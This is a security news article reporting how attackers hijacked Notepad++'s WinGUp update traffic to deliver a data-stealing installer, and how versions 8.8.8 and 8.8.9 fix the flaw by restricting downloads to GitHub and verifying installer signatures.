Notepad++, one of the most widely used text editors on Windows, has rolled out version 8.8.9 to patch a serious security flaw that allowed attackers to hijack its update process and push malicious update files to unsuspecting users.
Users Spot Suspicious Update Behavior
The issue came to light when a user on the Notepad++ community forum noticed that Notepad++’s updater, WinGUp, launched a suspicious file called AutoUpdater.exe from the system’s Temp folder. The file quietly executed a series of system-reconnaissance commands, gathering system details such as running tasks, network information, and user data, and storing the output in a file called a.txt.
Moments later, the malware used a curl command to upload that data to temp.sh, a service known for hosting files used in past malware campaigns.
These actions were a red flag because WinGUp doesn’t collect such data, nor does it use the regular Windows curl.exe program. This raised early suspicions among users that either a fake Notepad++ installation had been downloaded or that the program’s update traffic had been hijacked.
Security Researcher Links Multiple Incidents
Soon after, more reports surfaced — this time from security expert Kevin Beaumont, who heard from three separate organizations in East Asia that had experienced similar compromise originating from Notepad++ processes.
According to Beaumont, in each case, Notepad++ processes appeared to be the entry point for threat actors who later carried out hands-on activity inside the victims’ networks.
How The Attack Worked
Notepad++ periodically checks for updates by contacting a URL that returns XML data containing the latest version and the corresponding download link to the latest installer. If attackers intercept this traffic and modify the <Location> tag in the XML, the updater will fetch a file from any destination they choose.
Researchers believe attackers intercepted Notepad++’s update traffic and swapped the legitimate download link with a malicious one — an attack made possible because older versions of WinGUp didn’t verify file signatures or certificates. As a result, the rogue installer was treated as a normal update and executed without warning.
Beaumont noted that while large-scale hijacking is difficult, targeted interception — especially within specific regions or industries or ISPs — is entirely feasible.Â
Notepad++’s Response
To address the issue, Notepad++ developer Don Ho released:Â
- Version 8.8.8, on November 18, which forces updates to download only from GitHub, reducing exposure to malicious redirects.
- Version 8.8.9, on December 9, which now verifies digital signatures and certificates for every installer.
If a file is tampered with — or simply not officially signed — the update is immediately blocked.
“Starting with this release, Notepad++ & WinGUp have been hardened to verify the signature & certificate of downloaded installers during the update process. If verification fails, the update will be aborted,” explains the Notepad 8.8.9 security notice.
The exact method of traffic hijacking is still under investigation, but users are urged to upgrade to version 8.8.9 immediately and avoid downloading installers from unofficial sources.
What Users Should Do
Given the severity of the flaw, anyone running Notepad++ is strongly urged to upgrade to version 8.8.9 immediately. Older versions remain vulnerable, and their built-in updater cannot reliably detect malicious downloads.
The safest approach is to download the latest version, which also includes additional bug fixes and improvements, all available on the official Notepad++ website and GitHub repository.
